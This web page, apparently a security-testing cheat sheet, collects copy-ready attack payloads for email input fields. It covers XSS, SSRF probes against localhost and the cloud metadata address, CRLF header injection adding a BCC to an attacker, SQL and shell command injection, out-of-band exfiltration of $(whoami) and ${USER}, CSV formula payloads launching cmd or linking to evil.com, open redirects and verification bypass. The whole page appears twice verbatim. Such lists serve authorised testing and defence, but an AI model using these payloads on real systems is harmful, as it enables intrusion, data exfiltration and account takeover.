Email Input Testing

Complete methodology for testing email input fields — from RFC822 validation to XSS, SSRF, header injection, SQLi, command injection, and business logic abuse.

17 Categories63 CommandsCopy Ready

Email Input Testing

Email field injection testing including XSS, SSRF, SQLi, and header injection payloads.

Last updated: 2026-05-15

Intro

Introduction

1 commands

1Complete testing methodology with practical payloads for each vulnerability type.

Email input fields are a critical attack surface — vulnerable to XSS, SSRF, header injection, SQLi, command injection, and business logic flaws. This guide covers foundational + advanced testing methodology.

Phase 1

RFC822 Email Validation Testing

13 commands

1#1 Standard valid email

simple@example.com — Valid (Standard format)

2#2 Dots in local part

very.common@example.com — Valid (Dots in local part)

3#3 Plus addressing

disposable.style.email.with+symbol@example.com — Valid (Plus symbol)

4#4 IP literal format (rare but valid)

user@[192.168.1.1] — Valid (Address literal)

5#5 Quoted local part with spaces

"much.more unusual"@example.com — Valid (Quoted local part)

6#6 Local domain name without TLD

admin@mailserver1 — Valid (Local domain, no TLD)

7#7 Missing @ and domain

plainaddress — Invalid (Missing @)

8#8 Missing local part

@missinglocal.org — Invalid (Missing local part)

9#9 Leading dot

username@.com — Invalid (Leading dot in domain)

10#10 Leading hyphen

username@-example.com — Invalid (Leading hyphen)

11#11 Double dot

username@example..com — Invalid (Double dot)

12#12 Underscore in domain

username@exam_ple.com — Invalid (Underscore in domain)

13#13 Unicode character in domain

test@examp℮.com — Invalid (Unicode in domain)

Phase 2

RFC822 Python Validator Script

2 commands

1RFC822 email validator script — test any email format against the standard (full code on GitHub)

python3 rfc822_email_validator.py # Enter email when prompted. Returns YES/NO based on RFC822 compliance.

2GitHub repo with full RFC822 validator code

https://github.com/coffinxp/RFC822-Email-Validator

Phase 3

Cross-Site Scripting (XSS)

3 commands

1#1 Classic XSS via email field

"><script>alert(1)</script>@test.com

2#2 SVG-based XSS payload

"><svg/onload=alert(3)>@test.com

3#3 XSS with confirm() in email field

"><svg/onload=confirm(1337)>"@x.y

Phase 4

Server-Side Request Forgery (SSRF)

5 commands

1#1 SSRF via Burp Collaborator — monitor for outbound requests

test@your-burpcollaborator.net

2#2 Requestbin — alternative callback monitor

test@requestbin.net

3#3 Test localhost — may trigger internal requests

test@127.0.0.1

4#4 Localhost SSRF test

test@localhost

5#5 AWS/GCP/Azure metadata endpoint SSRF

test@169.254.169.254

Phase 5

Email Header Injection

4 commands

1#1 CRLF — blind CC (URL-encoded)

test@example.com%0d%0aBCC:attacker@example.com

2#2 CRLF — blind CC (raw)

test@example.com\r\nBCC:attacker@example.com

3#3 LF-only — blind CC

test@example.com%0aCC:attacker@example.com

4#4 Inject HTML content into email body

test@example.com\r\nContent-Type:text/html\r\n\r\n<b>Injected</b>

Phase 6

SQL Injection

4 commands

1#1 SQLi with single quotes

test' OR '1'='1@example.com

2#2 SQLi with double quotes

test" OR "1"="1@example.com

3#3 SQL comment injection

test@example.com'--

4#4 SQLi with closing parenthesis

test@example.com") OR 1=1--

Phase 7

Command Injection

7 commands

1#1 Command injection with semicolon

test@example.com; whoami

2#2 Command injection with AND

test@example.com && id

3#3 Command injection with pipe

test@example.com | uname -a

4#4 Backtick command injection

test@example.com`id`

5#5 Blind command injection via OOB callback

`whoami`.yourdomain.oast.fun

6#6 Blind command injection with $()

$(whoami).yourdomain.oast.fun

7#7 Environment variable exfiltration via OOB

${USER}.yourdomain.oast.fun

Phase 8

Open Redirect

2 commands

1#1 CRLF injection to set redirect Location header

test@example.com%0d%0aLocation:https://evil.com

2#2 Open redirect via next/redirect param in email context

test@example.com/?next=https://evil.com

Phase 9

IDOR / User Enumeration

3 commands

1#1 Test known admin email for response differences

admin@example.com

2#2 Test known user email

user@example.com

3#3 Compare response with nonexistent email — look for error message differences

nonexistent@example.com

Phase 10

Format / Validation Bypass

6 commands

1#1 Quoted email — bypasses simple validation

"test@evil.com"@example.com

2#2 Double dot in domain

test@subdomain..com

3#3 Leading hyphen in domain

test@-example.com

4#4 TLD-only domain

test@.com

5#5 Underscore in domain

test@exam_ple.com

6#6 Unicode homoglyph in domain

test@examp℮.com

Phase 11

CRLF Injection

2 commands

1#1 CRLF — inject HTTP response header

test@example.com%0d%0aInjected-Header: injected

2#2 LF-only — inject HTTP response header

test@example.com%0aInjected-Header: injected

Phase 12

Business Logic Abuse

3 commands

1#1 Duplicate registration — may bypass uniqueness checks

Register same email multiple times — check for duplicate accounts

2#2 Email takeover — change email then intercept verification

Change email to another user's email — intercept verification request

3#3 Response manipulation — bypass email verification

Intercept and modify verification response (is_verified: false → true)

Phase 13

Unicode / Homograph Attacks

2 commands

1#1 Cyrillic homoglyph — visually identical to 'a'

test@exаmple.com (Cyrillic 'а')

2#2 Unicode character in domain

test@examp℮.com

Phase 14

Injection in Downstream Systems

3 commands

1#1 CSV injection — formula execution in spreadsheets

=cmd|' /C calc'!A0

2#2 CSV injection — hyperlink payload

"=HYPERLINK("http://evil.com")"

3#3 Log injection — fake log entries

test@example.com\nInjectedLogEntry

Phase 15

Rate Limiting & Enumeration

2 commands

1#1 Enumerate valid users via response differences in password reset

Automate password reset attempts with different emails → Monitor response differences

2#2 Test rate limiting on registration endpoint

Automate registration attempts → Check for CAPTCHA or rate limit blocks

Phase 16

Conclusion

1 commands

1Test all categories methodically. Email fields are a high-value attack surface.

Complete email input assessment requires testing: XSS → SSRF → Header Injection → SQLi → Command Injection → Open Redirect → IDOR → Format Bypass → CRLF → Business Logic → Unicode → CSV Injection → Rate Limiting

Tools

Tools & Resources

RFC822 Email Validator

Python script to validate email addresses against RFC822 standard

Burp Collaborator

Out-of-band interaction detection for SSRF and blind injection testing

RequestBin

HTTP request inspection for SSRF and webhook testing

Email Input Testing

Complete methodology for testing email input fields — from RFC822 validation to XSS, SSRF, header injection, SQLi, command injection, and business logic abuse.

17 Categories63 CommandsCopy Ready

Email Input Testing

Email field injection testing including XSS, SSRF, SQLi, and header injection payloads.

Last updated: 2026-05-15

Intro

Introduction

1 commands

1Complete testing methodology with practical payloads for each vulnerability type.

Email input fields are a critical attack surface — vulnerable to XSS, SSRF, header injection, SQLi, command injection, and business logic flaws. This guide covers foundational + advanced testing methodology.

Phase 1

RFC822 Email Validation Testing

13 commands

1#1 Standard valid email

simple@example.com — Valid (Standard format)

2#2 Dots in local part

very.common@example.com — Valid (Dots in local part)

3#3 Plus addressing

disposable.style.email.with+symbol@example.com — Valid (Plus symbol)

4#4 IP literal format (rare but valid)

user@[192.168.1.1] — Valid (Address literal)

5#5 Quoted local part with spaces

"much.more unusual"@example.com — Valid (Quoted local part)

6#6 Local domain name without TLD

admin@mailserver1 — Valid (Local domain, no TLD)

7#7 Missing @ and domain

plainaddress — Invalid (Missing @)

8#8 Missing local part

@missinglocal.org — Invalid (Missing local part)

9#9 Leading dot

username@.com — Invalid (Leading dot in domain)

10#10 Leading hyphen

username@-example.com — Invalid (Leading hyphen)

11#11 Double dot

username@example..com — Invalid (Double dot)

12#12 Underscore in domain

username@exam_ple.com — Invalid (Underscore in domain)

13#13 Unicode character in domain

test@examp℮.com — Invalid (Unicode in domain)

Phase 2

RFC822 Python Validator Script

2 commands

1RFC822 email validator script — test any email format against the standard (full code on GitHub)

python3 rfc822_email_validator.py # Enter email when prompted. Returns YES/NO based on RFC822 compliance.

2GitHub repo with full RFC822 validator code

https://github.com/coffinxp/RFC822-Email-Validator

Phase 3

Cross-Site Scripting (XSS)

3 commands

1#1 Classic XSS via email field

"><script>alert(1)</script>@test.com

2#2 SVG-based XSS payload

"><svg/onload=alert(3)>@test.com

3#3 XSS with confirm() in email field

"><svg/onload=confirm(1337)>"@x.y

Phase 4

Server-Side Request Forgery (SSRF)

5 commands

1#1 SSRF via Burp Collaborator — monitor for outbound requests

test@your-burpcollaborator.net

2#2 Requestbin — alternative callback monitor

test@requestbin.net

3#3 Test localhost — may trigger internal requests

test@127.0.0.1

4#4 Localhost SSRF test

test@localhost

5#5 AWS/GCP/Azure metadata endpoint SSRF

test@169.254.169.254

Phase 5

Email Header Injection

4 commands

1#1 CRLF — blind CC (URL-encoded)

test@example.com%0d%0aBCC:attacker@example.com

2#2 CRLF — blind CC (raw)

test@example.com\r\nBCC:attacker@example.com

3#3 LF-only — blind CC

test@example.com%0aCC:attacker@example.com

4#4 Inject HTML content into email body

test@example.com\r\nContent-Type:text/html\r\n\r\n<b>Injected</b>

Phase 6

SQL Injection

4 commands

1#1 SQLi with single quotes

test' OR '1'='1@example.com

2#2 SQLi with double quotes

test" OR "1"="1@example.com

3#3 SQL comment injection

test@example.com'--

4#4 SQLi with closing parenthesis

test@example.com") OR 1=1--

Phase 7

Command Injection

7 commands

1#1 Command injection with semicolon

test@example.com; whoami

2#2 Command injection with AND

test@example.com && id

3#3 Command injection with pipe

test@example.com | uname -a

4#4 Backtick command injection

test@example.com`id`

5#5 Blind command injection via OOB callback

`whoami`.yourdomain.oast.fun

6#6 Blind command injection with $()

$(whoami).yourdomain.oast.fun

7#7 Environment variable exfiltration via OOB

${USER}.yourdomain.oast.fun

Phase 8

Open Redirect

2 commands

1#1 CRLF injection to set redirect Location header

test@example.com%0d%0aLocation:https://evil.com

2#2 Open redirect via next/redirect param in email context

test@example.com/?next=https://evil.com

Phase 9

IDOR / User Enumeration

3 commands

1#1 Test known admin email for response differences

admin@example.com

2#2 Test known user email

user@example.com

3#3 Compare response with nonexistent email — look for error message differences

nonexistent@example.com

Phase 10

Format / Validation Bypass

6 commands

1#1 Quoted email — bypasses simple validation

"test@evil.com"@example.com

2#2 Double dot in domain

test@subdomain..com

3#3 Leading hyphen in domain

test@-example.com

4#4 TLD-only domain

test@.com

5#5 Underscore in domain

test@exam_ple.com

6#6 Unicode homoglyph in domain

test@examp℮.com

Phase 11

CRLF Injection

2 commands

1#1 CRLF — inject HTTP response header

test@example.com%0d%0aInjected-Header: injected

2#2 LF-only — inject HTTP response header

test@example.com%0aInjected-Header: injected

Phase 12

Business Logic Abuse

3 commands

1#1 Duplicate registration — may bypass uniqueness checks

Register same email multiple times — check for duplicate accounts

2#2 Email takeover — change email then intercept verification

Change email to another user's email — intercept verification request

3#3 Response manipulation — bypass email verification

Intercept and modify verification response (is_verified: false → true)

Phase 13

Unicode / Homograph Attacks

2 commands

1#1 Cyrillic homoglyph — visually identical to 'a'

test@exаmple.com (Cyrillic 'а')

2#2 Unicode character in domain

test@examp℮.com

Phase 14

Injection in Downstream Systems

3 commands

1#1 CSV injection — formula execution in spreadsheets

=cmd|' /C calc'!A0

2#2 CSV injection — hyperlink payload

"=HYPERLINK("http://evil.com")"

3#3 Log injection — fake log entries

test@example.com\nInjectedLogEntry

Phase 15

Rate Limiting & Enumeration

2 commands

1#1 Enumerate valid users via response differences in password reset

Automate password reset attempts with different emails → Monitor response differences

2#2 Test rate limiting on registration endpoint

Automate registration attempts → Check for CAPTCHA or rate limit blocks

Phase 16

Conclusion

1 commands

1Test all categories methodically. Email fields are a high-value attack surface.

Complete email input assessment requires testing: XSS → SSRF → Header Injection → SQLi → Command Injection → Open Redirect → IDOR → Format Bypass → CRLF → Business Logic → Unicode → CSV Injection → Rate Limiting

Tools

Tools & Resources

RFC822 Email Validator

Python script to validate email addresses against RFC822 standard

Burp Collaborator

Out-of-band interaction detection for SSRF and blind injection testing

RequestBin

HTTP request inspection for SSRF and webhook testing